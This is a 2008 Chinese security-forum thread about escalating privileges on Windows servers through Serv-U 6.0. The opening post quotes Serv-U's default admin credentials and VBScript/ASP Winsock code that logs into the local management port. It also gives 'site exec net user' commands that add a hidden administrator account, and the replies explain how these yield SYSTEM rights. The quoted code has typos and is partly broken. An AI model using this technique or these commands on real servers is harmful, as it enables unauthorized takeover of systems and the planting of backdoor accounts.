Board logo

标题: [讨论]Serv-u6.0提权新招(结帖) [打印本页]

作者: jjcd    时间: 2008-7-23 08:35     标题: [讨论]Serv-u6.0提权新招(结帖)

[讨论]Serv-u6.0提权新招(结帖)
议题提交:宿心劫

第一次见到这段码时 认为是不可能的 因为控件的问题
现在听KEVIN的分析 就够了
我提出的第二个问题 是因为我没绕过一个弯
引用:
来源:黑客防线
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator? 密码:#|@$ak#.|k;0@p???下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)

Sock.senddata.sendata
  
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add”
呵呵,就这样系统权限到手了,祝大家好运!
我有两个问题
一、MSWINSCK.OCX控件为VB 网络支持库  系统是不自带的
参考文章《关于VBS调用MSWinsock控件》
http://www.eviloctal.com/forum/read.php?tid=8748&fpage=1

二、文中提到"下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户"
我想问一下  这段本地提权的码 真的有system权限吗风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 赚更多的钱

kevin1986
荣誉会员

作者: 揸拖拉机入西藏    时间: 2008-7-23 08:35

恩....这样的主机的确是很少,不过我曾经遇见过有安装过VB的主机,这样的主机是可行的.因为MSWINSCK.OCX在VB中带的,所以可以用来创建连接.
而文章中说说的是向Serv-U的43958端口发包,也就是Su.exe这类提全工具的原理..明白否?me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华12 积分3936 阅读权限100 性别男 在线时间308 小时 注册时间2005-2-5 最后登录2007-9-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

宿心劫
荣誉会员

作者: Nicky    时间: 2008-7-23 08:35

提权的原理我一直都清楚
只是对那个控件表示怀疑
但Su.exe提权需要能够被执行(权限要求是有的)
而且文中提到是以system权限添加超级用户
我就不懂了
ASP执行时有那么大的权限?风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类

帖子108 精华4 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

我非我
荣誉会员

作者: aaronliu    时间: 2008-7-23 08:35

原理是和kevin说的一样。不过上面的ftp添加用户的语句没有给全。你可以到su.exe的原码里找。但如果是直接用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add” 这样发到43958是没用的。因为localadmin是没法执行。
你添加了ftp有执行权限的用户后再利用这个ftp用户添加系统用户。此时会有权限。因为它此时继承的是servu的权限。不是iisuser的了。
你看我的servuexp的php版的代码应该可以看懂。思路一样的。只不过这个代码是asp的,而且不太通用罢了。http://www.phpweblog.net/GaRY/

帖子150 精华6 积分5639 阅读权限100 性别男 在线时间189 小时 注册时间2005-2-4 最后登录2008-1-31 查看详细资料TOP

kevin1986
荣誉会员

作者: 贝贝猫    时间: 2008-7-23 08:35

不是呢...
那个控件是没问题了.
只是,用ASP调用这个控件对43958端口发送一串添加具有可执行的FTP帐户的包,然后再通过Serv-U来执行命令达到提升权限的目的.
这个相当于小我的SERV-U提权PHP程序的ASP版本吧.我曾经成功过的me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华12 积分3936 阅读权限100 性别男 在线时间308 小时 注册时间2005-2-5 最后登录2007-9-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

撕碎了的小C
技术核心组

作者: pat1110    时间: 2008-7-23 08:35

如果可以向管理端口发送数据的话,得到的权限理论上应该跟SERV-U一样,如果SERV-U是以服务启动的话就可以得到SYSTEM权限。我是金子,我要闪光的....!
帖子128 精华4 积分3748 阅读权限200 性别男 来自湖南 在线时间124 小时 注册时间2005-1-28 最后登录2008-7-8 查看详细资料TOP 少女暴富的隐秘(图)

serenade
晶莹剔透§烈日灼然
作者: Ange细    时间: 2008-7-23 08:35

如果SERV-U是以服务启动的,但是是以guest组用户启动的(组策略+服务设置),那么。。。不行。。。
帖子8 精华0 积分7 阅读权限40 在线时间51 小时 注册时间2005-6-3 最后登录2008-7-2 查看详细资料TOP 让女孩一夜变的更有女人味

shoojun
晶莹剔透§烈日灼然
作者: CID6    时间: 2008-7-23 08:35

那就必须在端口下工夫了!有什么攻击活动请告诉我!!!

帖子12 精华0 积分11 阅读权限40 性别男 来自E.S.T 在线时间0 小时 注册时间2005-3-24 最后登录2005-7-19 查看个人网站
查看详细资料TOP

mlove
mlove

作者: dgyys    时间: 2008-7-23 08:35

提示: 作者被禁止或删除 内容自动屏蔽
帖子20 精华0 积分-6 阅读权限0 性别男 来自邪恶八进制 在线时间8 小时 注册时间2008-1-8 最后登录2008-4-7 查看详细资料TOP

gxm
荣誉会员





欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2